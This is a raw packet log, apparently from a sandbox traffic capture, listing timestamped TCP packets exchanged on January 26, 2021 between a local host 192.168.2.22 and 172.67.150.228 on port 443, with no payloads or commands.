Jan 26, 2021 21:38:14.429619074 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429619074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429640055 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429655075 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.430552006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.430576086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.430608034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.430629969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.430640936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.430651903 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.430653095 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.430670023 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.430676937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.430687904 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.430706978 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.431356907 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.431382895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.431406021 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.431416035 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.431430101 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.431432962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.431452036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.431452990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.431473017 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.431478024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.431499958 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.431518078 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.432363033 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.432387114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.432409048 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.432430029 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.432447910 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.432450056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.432462931 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.432471991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.432480097 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.432508945 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.433288097 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.433311939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.433339119 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.433357000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.433357954 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.433378935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.433393955 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.433399916 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.433404922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.433410883 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.433419943 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.433451891 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434137106 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434262991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.434288979 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.434309006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.434319019 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434330940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434331894 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.434349060 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434354067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.434364080 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434375048 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.434382915 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.434415102 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.435252905 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.435280085 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.435300112 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.435321093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.435323000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.435339928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.435343027 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.435362101 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.435365915 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.435384989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.435400963 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.439517975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492166996 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492204905 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492228985 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492249966 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492271900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492292881 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492350101 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492372990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492480993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492518902 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492541075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492542028 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492563009 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492563009 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492575884 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492587090 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492594004 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492608070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.492615938 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.492654085 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.493509054 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.493532896 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.493554115 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.493575096 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.493596077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.493606091 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.493616104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.493623972 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.493640900 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.493654966 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.494434118 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.494457006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.494481087 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.494501114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.494520903 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.494539022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.494540930 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.494554043 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.494568110 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.494585037 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.495433092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.495455027 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.495476007 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.495495081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.495517969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.495520115 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.495532990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.495539904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.495553017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.495573044 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.496386051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.496407986 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.496427059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.496448040 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.496462107 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.496469021 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.496475935 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.496490002 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.496493101 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.496507883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.496521950 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.496555090 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.497349977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.497373104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.497402906 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.497419119 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.497422934 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.497433901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.497443914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.497454882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.497464895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.497471094 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.497498989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.498297930 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.498322964 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.498343945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.498347998 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.498363972 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.498366117 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.498378992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.498389006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.498398066 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.498409986 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.498414993 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.498442888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.499222040 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.499245882 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.499265909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.499265909 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.499280930 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.499289989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.499300957 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.499311924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.499320030 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.499335051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.499346972 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.499366045 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.500145912 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.500207901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.502322912 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.511240959 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.511265993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.511286974 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.511307001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.511324883 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.511385918 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.513686895 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.534094095 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.534120083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.534136057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.534272909 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.541059971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.541080952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.541212082 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.542788982 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.542812109 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.542843103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.542864084 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.542879105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.542885065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.542896032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.542897940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.542906046 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.542915106 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.542932987 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.543186903 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.543210983 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.543231964 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.543235064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.543248892 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.543252945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.543262005 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.543275118 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.543282032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.543298960 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.543308973 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.543325901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.544157028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.544179916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.544202089 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.544214964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.544224977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.544226885 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.544240952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.544245958 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.544256926 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.544266939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.544274092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.544312000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.545082092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.545108080 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.545128107 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.545130014 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.545142889 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.545149088 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.545170069 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.545176029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.545191050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.545193911 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.545212030 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.545228004 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546030998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546055079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546076059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546077967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546093941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546098948 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546108007 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546119928 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546123981 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546142101 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546154976 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546171904 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.546957970 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.546983004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.547004938 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.547008038 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547018051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547025919 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.547034979 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547046900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.547051907 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547069073 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.547080040 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547099113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547255993 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.547956944 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.547981977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548001051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548005104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548012018 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548026085 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548039913 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548046112 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548058033 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548070908 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548074961 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548105001 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548927069 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548949003 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548969984 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.548988104 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.548990965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.549010992 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.549014091 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.549017906 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.549021959 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.549041986 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.553010941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.574356079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.574383020 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.574404001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.574424982 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.574440002 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.574501991 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.574812889 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.590857029 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.590884924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.590900898 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.591023922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.597274065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.597300053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.597316980 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.597426891 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.598855972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.598874092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.598959923 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599160910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599183083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599204063 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599211931 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599225998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599251032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599251032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599257946 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599261045 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599273920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599281073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599308014 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599926949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599951029 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599972010 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.599991083 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.599992990 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600008965 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600013971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600025892 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600035906 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600048065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600065947 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600801945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600826025 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600847006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600850105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600863934 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600867987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600878000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600892067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600893974 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600914001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.600925922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.600944042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.601849079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.601872921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.601893902 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.601903915 CET	49167	443	192.168.2.22	172.67.150.228
